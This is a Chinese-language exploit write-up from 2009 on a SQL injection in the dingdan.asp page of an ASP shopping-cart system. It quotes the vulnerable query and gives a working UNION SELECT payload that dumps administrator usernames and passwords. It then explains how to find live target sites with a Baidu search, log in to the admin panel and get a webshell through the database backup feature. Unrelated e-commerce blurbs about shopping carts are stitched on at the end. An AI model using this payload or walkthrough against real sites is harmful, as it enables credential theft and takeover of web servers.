作者:flaw0r
版本:v1.1a bulid 20090413 access free
漏洞一:dingdan.asp注入漏洞
漏洞等級:嚴重
問題**:
dingdan=request.querystring("dan")
set rs=server.createobject("adodb.recordset")
rs.open "select bjx_goods.bookid,bjx_goods.shjiaid,bjx_goods.bookname,bjx_goods.shichangjia,bjx_goods.huiyuanjia,
bjx_action.actiondate,bjx_action.shou***,bjx_action.danjia,bjx_action.feiyong,bjx_action.******,
bjx_action.userzhenshiname,bjx_action.shouhuoname,bjx_action.dingdan,bjx_action.youbian,
bjx_action.liuyan,bjx_action.zhifufangshi,bjx_action.songhuofangshi,bjx_action.zhuangtai,
bjx_action.zonger,bjx_action.useremail,bjx_action.usertel,bjx_action.shouhuodizhi,
bjx_action.bookcount,bjx_action.star,
bjx_action.pingjia from bjx_goods inner join bjx_action on bjx_goods.bookid=bjx_action.bookid where bjx_action.username="&request.cookies("bjx")("username")&"and dingdan="&dingdan&"",conn,1,1
注入測試**:
%20bjx_admin%20where%201=1
其實面對這套系統,真的很無語,和我之前分析的bobo****系統是乙個核心,所以漏洞和bobo的也就大同小異了,這裡我只給出乙個注入漏洞,真不知道現在的人都是怎麼想的,拿別人的程式一改就能賺錢?鄙視偷竊別人原始碼,拿去賣錢的人!(不是說這套程式是作者抄襲別人的,我拿的這套也是免費的,先鄙視下bobo)
後台有備份功能,所以拿shell也就相對簡單些了。
網路實戰:
在百度搜尋:易和陽光購物**
選定目標:
首先註冊乙個使用者,隨便選乙個商品下個訂單,然後到會員中心檢視改訂單
提交我們的測試語句:
dingdan.asp?dan=2009423113536%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from%20bjx_admin%20where%201=1
就可以爆出所有管理員的使用者名稱和密碼了
拿到管理員密碼登入後台,可以通過備份資料庫來獲得webshell
易初電商 易初電商專業教育
經過多年的發展,電子商務已經開始走向國際化與全球化。我國的電子商務活動已經滲透到大多數人的生活當中,社會中對電子商務人員的需求也更加旺盛,在此背景之下,易初電商開設了電子商務課程,目的就是為了迎合社會發展需求,向社會輸送更多優秀人才。易初電商聚集國內知名的全網全行業電商運營專家,通過最前沿 真實的電...
43 電商 實現購物車功能
購物車實現3種方式 1 利用cookie 優點 不占用伺服器資源,可以永遠儲存,不用考慮失效的問題 缺點 對購買商品的數量是有限制的,存放資料的大小 不可以超過2k,使用者如果禁用cookie那麼就木有辦法購買商品,卓越網實現了使用者當使用者禁用cookie,也可以購買。2 利用 session 優...
電商商城之購物車 待續
一 購物車的儲存形式 cookie 1 無須登陸 無須查庫 儲存在瀏覽器端 2 優點 效能好 訪問快,沒有和資料庫互動 3 缺點1 換電腦購物車資料會丟失 4 缺點2 電腦被其他人登陸,隱私安全 二 購物車儲存形式 session 不使用 1 使用者登陸後,購物車資料放入使用者會話 2 優點 初期效...